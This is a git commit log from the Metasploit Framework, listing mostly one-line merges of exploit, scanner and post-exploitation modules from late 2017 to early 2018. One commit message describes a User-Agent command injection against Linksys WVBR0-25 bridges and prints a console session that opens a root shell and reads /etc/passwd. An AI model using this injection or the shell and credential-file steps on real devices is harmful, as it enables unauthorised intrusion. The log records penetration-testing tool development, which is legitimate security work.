bwatters-r7
914f8ba872
Land #9734 , Remove unwanted 'pop RAX' from windows/x64/reverse_(win)http
2018-04-04 19:06:17 -07:00
bwatters-r7
4765ffc05a
Land #9595 , Add post module RID Hijacking on Windows
2018-04-04 19:06:17 -07:00
Brent Cook
ef4fd1dc75
Land #9742 , QNX exploit improvements
2018-04-03 09:13:57 -05:00
Brent Cook
9d5ab1dedf
Land #9726 , add simple Rex::Tar wrapper for consistency with other archive types
2018-04-03 09:13:56 -05:00
Brent Cook
c2bf848ba9
Land #9748 , Convert the smbloris DoS into an external module
...
Help reliability and performance. This some Ruby-specific external module
tooling as a result as well.
2018-04-03 09:13:56 -05:00
Brent Cook
1557540b08
Land #9774 , use correct whitespace when patching python meterpreter
2018-04-03 09:13:55 -05:00
Brent Cook
d6f23071ca
Land #9718 , Add get_user_spns 'kerberoasting' module
2018-04-03 09:13:29 -05:00
William Vu
10ed6637ed
Land #9782 , CheckCode::Safe for ms_ndproxy
2018-03-30 08:34:52 -07:00
Brent Cook
9d076f6842
Land #9776 , if data is nil, stop reading the heartbleed socket
2018-03-29 09:42:03 -07:00
Jon Hart
36ba1468e8
Land #9760 , @h00die's etcd scanner
2018-03-29 09:17:54 -07:00
Jacob Robles
3b87bf5a03
Land #9666 , Add 2017-8917 RCE for Joomla 3.7.0
2018-03-29 09:17:54 -07:00
Wei Chen
6108d79dcd
Land #9684 , Adding ManageEngine Application Manager RCE
...
Land #9684
2018-03-27 15:44:50 -07:00
Wei Chen
409ae22a7e
Land #9633 , Exodus Wallet Remote Code Execution
...
Land #9633
2018-03-27 15:44:49 -07:00
Wei Chen
5b1577e46d
Land #9670 , Gitstack v2.3.10 RCE
...
Land #9670
2018-03-27 14:24:23 -05:00
Jacob Robles
71a1ad69dc
Land #9636 , Improve post module persistence_exe
2018-03-27 14:21:48 -05:00
William Vu
b870091380
Land #9423 , PSH for jenkins_xstream_deserialize
2018-03-27 14:21:47 -05:00
William Vu
c31a8ab687
Land #9618 , pipe auditing improvements
2018-03-27 14:21:47 -05:00
h00die
72d2b46ac8
Land #9767 land magick number blog link update
2018-03-27 14:21:46 -05:00
h00die
c56e571b18
Land #9702 exploit for clipbucket
2018-03-27 13:55:43 -05:00
Brent Cook
37576d19a1
Land #9733 , rename external templates
2018-03-22 11:18:22 -07:00
Jeffrey Martin
d756db4f9d
Land #9613 , add bind_named_pipe x86
2018-03-17 20:33:05 -07:00
Brent Cook
ef7b77ed01
Land #9529 , Add module for HP iLO CVE-2017-12542 authentication bypass
2018-03-17 20:33:05 -07:00
Brent Cook
dcb514e5ac
Land #9694 , move ssh platforms to lib
2018-03-17 20:33:04 -07:00
Jacob Robles
715279311a
Land #8422 , Typo3 News Module Sql Injection exploit
2018-03-15 09:21:14 -07:00
Tim W
8f4895c8e7
Land #9706 , bump metasploit payloads to fix #9497
2018-03-13 13:33:29 -07:00
Brent Cook
c5e231cfbf
Land #9686 , add ipv6 to slowloris, rhost to non-scanner modules
2018-03-13 13:33:28 -07:00
Brent Cook
028d329b4d
Land #9632 , owa_login and auth_brute enhancements
2018-03-12 10:14:19 -07:00
Jacob Robles
8c60a73731
varnish anonymous file read
2018-03-09 14:55:11 -06:00
Jacob Robles
bcc0a2a94c
Land #7654 , varnish file read
2018-03-09 12:53:20 -08:00
Jeffrey Martin
4778de053a
Land #9687 , bump payloads, fix PHP meterpreter message parsing
2018-03-07 18:47:47 -08:00
Jacob Robles
49bc0024c1
Land #9678 , Add memcached UDP version scanner
2018-03-07 18:47:47 -08:00
Jacob Robles
fbee660136
Land #9554 , Eclipse Equinoxe OSGi console RCE
2018-03-07 07:49:31 -08:00
Jon Hart
64019d3301
Land #9676 , correcting CVE and adding disclosure date for memcached
...
amplification
2018-03-07 07:49:30 -08:00
Brent Cook
f6223c0193
Land #9614 , Juniper post enum module
2018-03-07 07:49:29 -08:00
bwatters-r7
9be7bc9b21
Land #9665 , Add missing reverse_tcp_rc4 payload tests.
...
Merge branch 'land-9665' into upstream-master
2018-03-05 15:29:21 -08:00
William Vu
d3b4f91b4c
Land #9671 , missed code from TelnetEnable refactor
2018-03-05 15:29:21 -08:00
Jon Hart
6909c635bc
Land #9644 , @xistence's memcached stats amplification scanner
2018-03-05 15:29:20 -08:00
h00die
2731b91036
Land #9658 spelling and grammar fixes
2018-03-05 07:42:48 -08:00
h00die
e57a1fbd43
Land #9650 netgear telnetenable exploit
2018-03-05 07:42:48 -08:00
bwatters-r7
00d5fcfd97
ReLand #9565 , Reverse TCP x64 RC4 via max3raza's rc4_x64 asm
...
This reverts commit 7964868fcd
.
2018-03-02 17:46:46 -06:00
bwatters-r7
d2150c8d15
Revert "Land #9565 , Reverse TCP x64 RC4 via max3raza's rc4_x64 asm"
...
This reverts commit fcc579377f
, reversing
changes made to 95cd149378
.
2018-03-02 17:45:58 -06:00
bwatters-r7
4841f29190
Land #9565 , Reverse TCP x64 RC4 via max3raza's rc4_x64 asm
2018-03-02 16:41:33 -06:00
William Vu
3fd2862f76
Land #9639 , multi/handler exit on disabled handler
...
If DisablePayloadHandler is set, abort instead of hanging.
2018-03-01 07:48:02 -08:00
Sonny Gonzalez
667cc5bcca
Land #9653 , fix Y2k38 issue (until Jan 1, 2038)
2018-03-01 09:28:11 -06:00
Wei Chen
735fbc5c9f
Land #9623 , Support Win 2008/7+ for enum_ms_product_keys
...
Land #9623
2018-02-25 23:25:03 -08:00
Brent Cook
bffba1e5e3
Land #9607 , upgrade osx shells to osx meterpreter
2018-02-25 23:25:02 -08:00
William Vu
0a5e9d922f
Land #9601 , ms17_010_eternalblue reliability fixes
2018-02-23 08:31:02 -08:00
Brent Cook
2af4f56382
Land #9611 , Fix bug causing all OWA logins to appear valid
2018-02-23 08:31:01 -08:00
bwatters-r7
ac6fede928
Land #9441 , Create exploit for AsusWRT LAN RCE
...
Merge branch 'land-9441' into upstream-master
2018-02-23 08:31:01 -08:00
Jacob Robles
178afdaed1
Land #9604 , Fix logged errors when running without Python 3.6 / gmpy2
2018-02-22 08:27:37 -08:00
Brent Cook
a189673782
Land #9584 , Fix reverse_php_ssl infinite loop
2018-02-22 08:27:36 -08:00
Brent Cook
826b986018
Land #9602 , Create sessions with the Fortinet SSH backdoor scanner
2018-02-22 08:27:36 -08:00
Brent Cook
4e8fe54c6c
Land #9524 , prefer 'shell' channels over 'exec' channels for ssh CommandStream
2018-02-22 08:27:36 -08:00
William Vu
c1d701f656
Land #9593 , finger_users regex fix
2018-02-22 08:27:35 -08:00
Aaron Soto
dc913b60e4
Land #9444 - `hsts_eraser` module and docs
2018-02-22 08:27:35 -08:00
Jacob Robles
40220b5ab6
Land #9594 , CloudMe Sync v1.10.9 Buffer Overflow
2018-02-22 08:27:35 -08:00
Jacob Robles
72cb9f358e
Land #9561 , Disk Savvy Enterprise v10.4.18 built-in server buffer overflow
2018-02-22 08:27:34 -08:00
Brent Cook
59a41f04f7
Land #9366 , Add x64 staged Meterpreter for macOS
2018-02-20 09:24:41 -06:00
Brent Cook
8c2484d2da
Land #9164 , add OWA 2016 support
2018-02-20 09:24:13 -06:00
Chris Higgins
d2c203bcb9
Lands #9504 , MagniComp SysInfo privilege escalation
2018-02-20 09:24:13 -06:00
Brent Cook
d89a8c3eb9
Land #9571 , specify a python encoding for the claymore DoS module
2018-02-16 15:34:49 -08:00
Brent Cook
d2e71cfc8b
Land #9512 , Add Claymore Dual GPU Miner<= 10.5 DoS module
2018-02-16 15:34:48 -08:00
Brent Cook
31ed50ac92
Land #9539 , add bind_named_pipe transport to Windows meterpreter
2018-02-16 15:34:47 -08:00
Wei Chen
004e228a52
Land #9509 , Ulterius Server < v1.9.5.0 Directory Traversal
...
Land #9509
2018-02-16 15:34:47 -08:00
Brent Cook
e8ad3a98e9
Land #9558 , Fix #9417 , map timeout exp to a var for telnet_encrypt_overflow
2018-02-15 14:14:07 -08:00
Brent Cook
87dcb13413
update magic numbers
2018-02-15 15:25:47 -06:00
Brent Cook
0cee8485d0
Land #9557 , add back udp_probe for now
2018-02-14 11:26:59 -08:00
Spencer McIntyre
bdc0b47844
Land #9552 , add private_type for stored tomcat pw
...
Fixes #9513
2018-02-13 19:55:54 -08:00
Jeffrey Martin
aecc1f143f
Land #7699 , Add UDP handlers and payloads (redux)
2018-02-13 14:46:07 -08:00
Jacob Robles
f281b45384
Land #9546 , Correct Typo
2018-02-13 14:46:07 -08:00
Jacob Robles
e485b152e3
Land #9542 , Correct Typo
2018-02-13 14:46:06 -08:00
h00die
37cb2d77e7
Land #9422 abrt race condition priv esc on linux
2018-02-12 11:55:21 -06:00
Pearce Barry
6c3168c541
Land #9536 , Add Ubuntu notes to documentation
2018-02-12 11:55:19 -06:00
Pearce Barry
73bcec5d11
Land #9408 , Add Juju-run Agent Privilege Escalation module (CVE-2017-9232)
2018-02-12 11:55:19 -06:00
h00die
090f7c8bd6
Land #9467 linux priv esc against glibc origin
2018-02-12 11:55:19 -06:00
h00die
cd7187023c
Land #9469 linux local exploit for glibc ld audit
2018-02-12 11:55:18 -06:00
Brent Cook
32bd516e70
Land #9525 , Update mysql_hashdump for MySQL 5.7 and above
2018-02-12 11:55:17 -06:00
Adam Cammack
cd723ac86e
Add scanner for Bleichenbacher oracle (ROBOT)
2018-02-09 11:14:30 -06:00
Brent Cook
b696665adc
Land #9478 , Improve Dup Scout BOF exploit
2018-02-08 10:25:39 -06:00
Brent Cook
909b787a56
Land #9521 , flush pipe buffers when a process exists in mettle
2018-02-08 10:25:25 -06:00
William Vu
6c350be24e
Land #9473 , new MS17-010 aux and exploit modules
2018-02-02 11:32:40 -06:00
h00die
016af01fd8
Land #9399 a linux priv esc against apport and abrt
2018-02-02 11:32:29 -06:00
Brent Cook
ce3d5d77e4
Land #9481 , Update native DNS spoofer for Dnsruby
2018-02-02 11:32:18 -06:00
Brent Cook
ec12d61702
Land #9354 , Debut embedded httpd server (Brother printers) DoS
2018-02-02 11:31:59 -06:00
bwatters-r7
64746d8325
Land # 9407, Add BMC Server Automation RSCD Agent RCE exploit module
...
Merge branch 'land-9407' into upstream-master
2018-02-01 11:23:59 -06:00
h00die
b7fbffa331
Land #9445 fixes for ssl labs scanner module
2018-02-01 11:23:46 -06:00
Jacob Robles
4fa68f29d9
Land #9457 , Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow
2018-02-01 11:23:26 -06:00
Aaron Soto
395320ba97
Land #9379 , Oracle Weblogic RCE exploit and documentation
2018-01-26 18:08:56 -06:00
William Vu
a87ae41d81
Land #9446 , Post API fix for setuid_nmap
2018-01-26 18:08:47 -06:00
Matthew Kienow
b515a582f0
Land #9424 , Add SharknAT&To external scanner
2018-01-24 17:20:03 -06:00
Pearce Barry
926ce42a01
Land #8632 , colorado ftp fixes
2018-01-24 17:13:20 -06:00
bwatters-r7
2ea9ab2625
Land #9416 , Sync Breeze Enterprise 9.5.16 Import Command buffer overflow
...
Merge branch 'land-9416' into upstream-master
2018-01-24 17:13:16 -06:00
Adam Cammack
a4022f7b8f
Land #9430 , Improve Hyper-V checkvm checks
2018-01-24 17:13:12 -06:00
bwatters-r7
a136841794
Land #9114 , Add module for Kaltura <= 13.1.0 RCE (CVE-2017-14143)
...
Merge branch 'land-9114' into upstream-master
2018-01-24 17:13:00 -06:00
Brent Cook
d6beb94c59
Land #6611 , add native DNS to Rex, MSF mixin, sample modules
2018-01-24 17:12:52 -06:00
Brent Cook
5ec3da843e
Land #9349 , GoAhead LD_PRELOAD CGI Module
2018-01-24 17:12:47 -06:00
Brent Cook
294a8e0ada
Land #9413 , Expand the number of class names searched when checking for an exploitable JMX server
2018-01-24 17:12:43 -06:00
Brent Cook
bb73d2c07e
Land #9431 , Fix owa_login to handle inserting credentials for a hostname
2018-01-24 17:12:39 -06:00
Brent Cook
47682e3f37
Land #9404 , update module author
2018-01-24 17:12:34 -06:00
Wei Chen
ab610f599b
Land #9442 , Remove NoMethod Rescue for cerberus_sftp_enumusers
...
Land #9442
2018-01-24 17:12:25 -06:00
Wei Chen
10fafb62bb
Land #9436 - Fix cerberus_sftp_enumusers undefined method start for nil
...
Land #9436
Thanks Steve!
2018-01-24 17:12:16 -06:00
Brent Cook
512192d3b0
Land #9267 , Add targets to sshexec
2018-01-24 17:12:12 -06:00
Brent Cook
55c345418d
Land #9438 , address cmd_exec inconsistencies
2018-01-24 17:11:40 -06:00
Brent Cook
23619431aa
update stageless python sizes
2018-01-24 17:08:51 -06:00
Brent Cook
d6e966b079
Land #9414 , wp_admin_shell_upload - remove plugin dir after exploitation
2018-01-16 21:08:22 -06:00
William Vu
e5bd36da1c
Land #9402 , NIS bootparamd domain name disclosure
2018-01-15 15:36:00 -06:00
Christian Mehlmauer
2f9eebe28b
remove plugin dir
2018-01-15 14:48:59 +01:00
William Vu
736d438813
Address second round of feedback
...
Brain fart on guard clauses when I've been using them all this time...
Updating the conditions made the ternary fall out of favor.
Changed some wording in the doc to suggest the domain name for a
particular NIS server may be different from the bootparamd client's
configuration.
2018-01-13 22:55:01 -06:00
William Vu
1a8eb7bf2a
Update nis_ypserv_map after bootparam feedback
...
Yes, yes, I see the off-by-one "error." It's more accurate this way.
Basically, we want to ensure there's actually data to dump.
2018-01-13 15:40:17 -06:00
William Vu
c080329ee6
Update module after feedback
...
Looks like I can't decide on certain style preferences.
Not keen on using blank?, but I've used it before. Time to commit?
Also, fail_with has been fixed for aux and post since #8643 . Use it!
2018-01-13 15:40:11 -06:00
William Vu
eb8429cbd3
Revert "umlaut"
...
This reverts commit ffd7073420
.
2018-01-12 22:57:22 -06:00
Brendan Coles
ffd7073420
umlaut
2018-01-13 15:48:45 +11:00
Jeffrey Martin
1f1dc59d17
Land #9392 , python meterpreter whitespace normalization
2018-01-12 21:24:13 -06:00
William Vu
2916c5ae45
Rescue Rex::Proto::SunRPC::RPCTimeout
...
Coincidentally, this also fixes the rescue in the library, since
rescuing Timeout instead of Timeout::Error does nothing.
2018-01-12 19:34:59 -06:00
William Vu
0c9f1d71d3
Add NIS bootparamd domain name disclosure
2018-01-12 19:34:53 -06:00
Agahlot
488f27bf76
Small Typo
2018-01-12 07:05:30 -05:00
Wei Chen
e6c4fb1dab
Land #9269 , Add a new target for Sync Breeze Enterprise GET BoF
...
Land #9269
2018-01-11 16:54:23 -06:00
Wei Chen
f395e07fc6
Land #9269 , add new target for Sync Breeze Enterprise GET BoF
...
Land #9269
2018-01-11 16:53:02 -06:00
William Vu
4b225c30fd
Land #9368 , ye olde NIS ypserv map dumper
2018-01-10 22:02:36 -06:00
William Vu
f66b11f262
Nix an unneeded variable declaration
2018-01-10 20:24:02 -06:00
Wei Chen
6510ee53bc
Land #9204 , Add exploit for Samsung SRN-1670D (CVE-2017-16524)
...
Land #9204
2018-01-10 20:15:29 -06:00
Wei Chen
18c179a091
Update module and add documentation
...
This updates the module to pass:
* msftidy
* Ruby style guidelines
* Proper usage of Metasploit API
* Mostly other cosmetic fixes
A documentation is also added.
2018-01-10 20:13:42 -06:00
William Vu
b66889ac86
Rescue additional errors and refactor code
...
https://jvns.ca/blog/2015/11/27/why-rubys-timeout-is-dangerous-and-thread-dot-raise-is-terrifying/
2018-01-10 20:11:25 -06:00
Wei Chen
7e2c7837e5
Land #9325 , Add CVE-2017-6090 phpCollab 2.5.1 file upload exploit module
...
Land #9325
2018-01-10 17:39:50 -06:00
Wei Chen
b1f3f471f3
Update phpcollab_upload_exec code (also module documentation)
2018-01-10 17:38:52 -06:00
Wei Chen
dd737c3bc8
Land #9317 , remove multiple deprecated modules
...
Land #9317
The following modules are replaced by the following:
auxiliary/scanner/discovery/udp_probe
is replaced by:
auxiliary/scanner/discovery/udp_sweep
exploit/unix/webapp/wp_ninja_forms_unauthenticated_file_upload
is replaced by:
exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload
exploit/windows/misc/regsvr32_applocker_bypass_server
is replaced by:
exploits/multi/script/web_delivery
2018-01-10 15:47:20 -06:00
Wei Chen
8d77f35b16
Land #9373 , Add LabF nfsAxe FTP Client 3.7 Stack Buffer Overflow
...
Land #9373
2018-01-09 22:40:50 -06:00
Wei Chen
25280e3319
Update labf_nfsaxe and module documentation
2018-01-09 22:39:40 -06:00
Brent Cook
f125e13278
python meterpreter whitespace normalization
2018-01-09 16:08:52 -05:00
Wei Chen
777e383568
Land #9377 , Add HPE iMC dbman RestoreDBase Unauthenticated RCE exploit
...
Land #9377
2018-01-09 13:56:53 -06:00
Wei Chen
a0c9cdd73d
Land #9376 , Add HPE iMC dbman RestartDB Unauthenticated RCE exploit
...
Land #9376
2018-01-09 13:28:03 -06:00
Brent Cook
573ee28631
Land #9378 , Detect and return on bad VNC negotiations
2018-01-09 03:46:00 -05:00
William Vu
4a5a17a8e1
Add NIS ypserv map dumper
2018-01-08 14:27:53 -06:00
Wei Chen
d138f1508c
Land #9340 , Add exploit for Commvault Remote Command Injection
...
Land #9340
2018-01-07 12:17:26 -06:00
Daniel Teixeira
ff1806ef5f
Update labf_nfsaxe.rb
2018-01-07 16:46:06 +00:00
Daniel Teixeira
a69f275a39
Update labf_nfsaxe.rb
2018-01-05 21:14:47 +00:00
Daniel Teixeira
c819aebc76
Add files via upload
2018-01-05 21:11:21 +00:00
Daniel Teixeira
e797ca4781
Add files via upload
2018-01-05 21:00:47 +00:00
Daniel Teixeira
aca76e2a4e
Update labf_nfsaxe.rb
2018-01-05 20:58:36 +00:00
Daniel Teixeira
2643acbc25
Update labf_nfsaxe.rb
2018-01-05 20:55:49 +00:00
Daniel Teixeira
b29710c66b
Add files via upload
2018-01-05 20:47:27 +00:00
Daniel Teixeira
94a1198485
Update labf_nfsaxe.rb
2018-01-05 20:41:49 +00:00
Daniel Teixeira
b97785c7a9
Update labf_nfsaxe.rb
2018-01-05 18:46:33 +00:00
Daniel Teixeira
e7946549d7
Update labf_nfsaxe.rb
2018-01-05 18:31:40 +00:00
jgor
51e5fb450f
Detect and return on bad VNC negotiations
2018-01-05 10:12:13 -06:00
Brendan Coles
006514864b
Add HPE iMC dbman RestoreDBase Unauthenticated RCE exploit
2018-01-05 11:28:48 +00:00
Brendan Coles
52a5fc9e0a
Add HPE iMC dbman RestartDB Unauthenticated RCE exploit
2018-01-05 11:28:14 +00:00
Daniel Teixeira
a3fb8b6619
Update labf_nfsaxe.rb
2018-01-04 20:55:38 +00:00
Daniel Teixeira
e5bb4bf057
Add files via upload
2018-01-04 20:26:28 +00:00
h00die
65f444ddcc
land #9362 exploit for pfsense graph injection
2018-01-04 14:35:52 -05:00
wetw0rk
c9d6d0a7a7
-51
2018-01-04 12:25:31 -06:00
William Vu
366a20a4a4
Fix #9215 , minor style nitpick
2018-01-03 23:11:51 -06:00
Brent Cook
520e890520
Land #8581 , VMware Workstation ALSA Config File Local Privilege Escalation
2018-01-03 21:35:57 -06:00
Wei Chen
b8dde2e650
Land #9360 , Ayukov NFTP FTP client buffer overflow vulnerability
...
Land #9360
2018-01-03 20:56:12 -06:00
Wei Chen
04cf3017c0
Update ayukov_nftp exploit and module documentation
2018-01-03 20:52:57 -06:00
Aaron Soto
7849155347
Land #9359 , Improve DCE/RPC fault handling
2018-01-03 20:42:17 -06:00
William Vu
c3f10c1d57
Land #9336 , Linksys WVBR0-25 exploit
2018-01-03 18:13:44 -06:00
dmohanty-r7
a5fa63405f
Land #9206 , Add Xplico RCE exploit module
2018-01-03 16:02:51 -06:00
Adam Cammack
a98de2d9a3
Land #9358 , Support password protected key files
2018-01-03 15:12:28 -06:00
William Vu
a1d43c8f33
Land #9215 , new Drupageddon vector
2018-01-03 14:45:32 -06:00
William Vu
84c951cc1d
Land #8059 , Postfixadmin alias modification module
2018-01-03 14:29:49 -06:00
wetw0rk
16d709f180
changes+filedropper
2018-01-03 14:09:30 -06:00
wetw0rk
8f0e41e159
requested changes
2018-01-01 17:30:43 -06:00
wetw0rk
c47d09717d
pfsense graph sploit
2018-01-01 03:18:51 -06:00
Daniel Teixeira
67357e316b
Update ayukov_nftp.rb
2017-12-31 17:48:23 +00:00
Daniel Teixeira
10b2833e7c
Update ayukov_nftp.rb
2017-12-31 17:00:17 +00:00
Daniel Teixeira
21717ae0a2
Create ayukov_nftp.rb
2017-12-31 15:43:16 +00:00
bka-dev
086f657c56
Fix early termination of auxiliary/scanner/dcerpc/hidden
...
This commit fixes an issue, where auxiliary/scanner/dcerpc/hidden terminates directly, once an endpoint can't be reached or access is denied. Instead the next endpoint in list should be checked, instead of terminating directly.
2017-12-31 14:41:33 +01:00
RageLtMan
f2a8d68a1f
Permit encrypted SSH keys for login scanner
...
Net::SSH::KeyFactory permits loading keys using a passphrase.
The Framework SSH modules were implemented back when we had a fork
of net-ssh in our tree, and can now use functionality provided by
the upstream gem.
Update the ssh key login scanner to add a KEY_PASS datastore
OptString which is then passed to the KeyCollection class and used
in the updated :read_key method which now calls the KeyFactory to
read data and give us the appropriate String representation of the
key in the KeyCollection's cache.
A bit of cleanup performed as well, removing legacy code paths no
longer hit by the module. Shamelessly added self to authors, fair
amount of blood and sweat in the SSH subsystem over the years, hope
nobody objects.
Testing:
None yet
2017-12-31 02:53:06 -05:00
Brendan Coles
c153788424
Remove sleeps
2017-12-30 15:20:56 +00:00
Jan-Frederik Rieckers
7f3df74134
fixup! Adding Module for Postfixadmin CVE-2017-5930
...
Add error handling if request fails
Fix a typo in doc, add default value to doc
2017-12-30 13:04:23 +01:00
h00die
3516305517
land #9191 an exploit against HP LoadRunner magentproc
2017-12-29 16:35:43 -05:00
h00die
4dacc70b9a
slight updates to magentproc docs
2017-12-29 16:35:12 -05:00
h00die
b698095c49
slight updates to magentproc docs
2017-12-29 16:30:32 -05:00
Jan-Frederik Rieckers
289e887895
Adding Module for Postfixadmin CVE-2017-5930
...
This exploit allows domain admins to delete protected aliases.
It can be used to redirect aliases like abuse@domain and can aid in
further attacks.
2017-12-29 17:13:59 +01:00
Brent Cook
8de760f1f7
Land #9348 , Only use basic auth in couchdb_enum when credentials are provided
2017-12-28 21:24:45 -06:00
Pearce Barry
e614e9b732
Land #9268 , Update DiskBoss Module (EDB 42395)
2017-12-28 16:39:26 -06:00
Brent Cook
c2bb144d0f
Land #9302 , Implement ARD auth and add remote CVE-2017-13872 (iamroot) module
2017-12-28 14:11:26 -06:00
james
fad4ccece9
Only use basic auth in couchdb_enum when credentials are provided
2017-12-27 20:16:01 -06:00
Jon Hart
bbed7db13c
Merge branch 'upstream-master' into feature/mqtt-login
2017-12-27 13:08:44 -08:00
Tod Beardsley
e6de25d63b
Land #9316 Cambium modules and mixins, tx @juushya
...
These cover several of the CVEs mentioned in
https://blog.rapid7.com/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities/
2017-12-26 12:39:51 -06:00
Tod Beardsley
1bb2bb9d2c
Oops, no admin in that path
2017-12-26 12:06:45 -06:00
Tod Beardsley
9af88681a2
Move deprecation out 60 days
2017-12-26 11:56:47 -06:00
juushya
8b0f2214b1
few more updates
2017-12-23 03:04:11 +05:30
juushya
038119d9df
Use of get_cookies_parsed, changing dirs, marking deprecated in 2 mods, more
2017-12-23 00:14:27 +05:30
Jon Hart
d4bc98c13f
Merge branch 'upstream-master' into feature/mqtt-login
2017-12-22 08:07:40 -08:00
b0yd
ec7625af9f
Damn spaces...
2017-12-22 10:57:11 -05:00
b0yd
2b33b88fa4
Damn spaces
2017-12-22 10:54:31 -05:00
b0yd
e088c95a99
Module Cleanup
2017-12-22 10:51:01 -05:00
Jon Hart
b29948412e
Correct permissions, fixing warning
2017-12-22 07:27:11 -08:00
b0yd
d657a9dc53
Commvault Remote Command Injection
2017-12-22 10:04:13 -05:00
headlesszeke
3dfb836768
Ranking upgrade and uses agent key instead of manually setting user-agent in headers
2017-12-21 23:10:26 -06:00
headlesszeke
b31ac73996
Ensure vulnerability check cannot false positive with the power of runtime randomness
2017-12-21 22:53:46 -06:00
William Vu
caae33b417
Land #9170 , Linux UDF for mysql_udf_payload
2017-12-21 20:48:24 -06:00
headlesszeke
8c3836cc88
Removed msf/core require statement and extraneous debug message
2017-12-21 19:55:56 -06:00
juushya
a86abb0297
Implemented get_cookies_parsed
2017-12-22 05:36:36 +05:30
headlesszeke
2ee42e1433
Adds exploit module for CVE-2017-17411
...
This module is for exploiting vulnerable Linksys WVBR0-25 wireless video bridges using CVE-2017-17411. The vuln in question involves a command injection due to improper sanitization of the User-Agent header. The module makes an initial GET request to the root of the web server and checks the result for a vulnerable firmware version. If vulnerable, it makes a subsequent GET request with the User-Agent set to `";<payload> #`. This can be verified against WVBR0-25 devices running firmware < 1.0.41.
Example console output:
```
msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > info
Name: Linksys WVBR0-25 User-Agent Command Execution
Module: exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
Platform: Unix
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2017-12-13
Provided by:
HeadlessZeke
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload information:
Space: 1024
Description:
The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to
connect wireless Genie cable boxes to the Genie DVR, is vulnerable
to OS command injection in version < 1.0.41 of the web management
portal via the User-Agent header. Authentication is not required to
exploit this vulnerability.
References:
http://cvedetails.com/cve/2017-17411/
http://www.zerodayinitiative.com/advisories/ZDI-17-973
https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat)
cmd/unix/generic normal Unix Command, Generic Command Execution
cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat)
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104
RHOST => 10.0.0.104
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit
[*] 10.0.0.104:80 - Trying to access the device ...
[*] Started bind handler
[*] 10.0.0.104:80 - Exploiting...
[*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600
id
uid=0(root) gid=0(root)
^C
Abort session 1? [y/N] y
[*] 10.0.0.104 - Command shell session 1 closed. Reason: User exit
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/generic
payload => cmd/unix/generic
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set cmd cat /etc/passwd
cmd => cat /etc/passwd
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit
[*] 10.0.0.104:80 - Trying to access the device ...
[*] 10.0.0.104:80 - Exploiting...
[+] 10.0.0.104:80 - Command sent successfully
[*] 10.0.0.104:80 - Command output: root❌ 0:0::/:/bin/sh nobody❌ 99:99:Nobody:/:/bin/nologin sshd❌ 22:22::/var/empty:/sbin/nologin admin❌ 1000:1000:Admin User:/tmp/home/admin:/bin/sh quagga❌ 1001:1001:Quagga
[*] Exploit completed, but no session was created.
msf exploit(linksys_wvbr0_user_agent_exec_noauth) >
```
2017-12-21 17:44:35 -06:00
Tod Beardsley
5dfb5d581a
Switch get_cookies to get_cookies_parsed
...
Am I doing it right? See #9333
2017-12-21 09:00:56 -06:00
Jon Hart
962bc71d10
Merge branch 'feature/mqtt' into feature/mqtt-login
2017-12-20 18:58:36 -08:00
Jon Hart
298cb16b1a
Set default USER/PASS files
2017-12-20 18:44:43 -08:00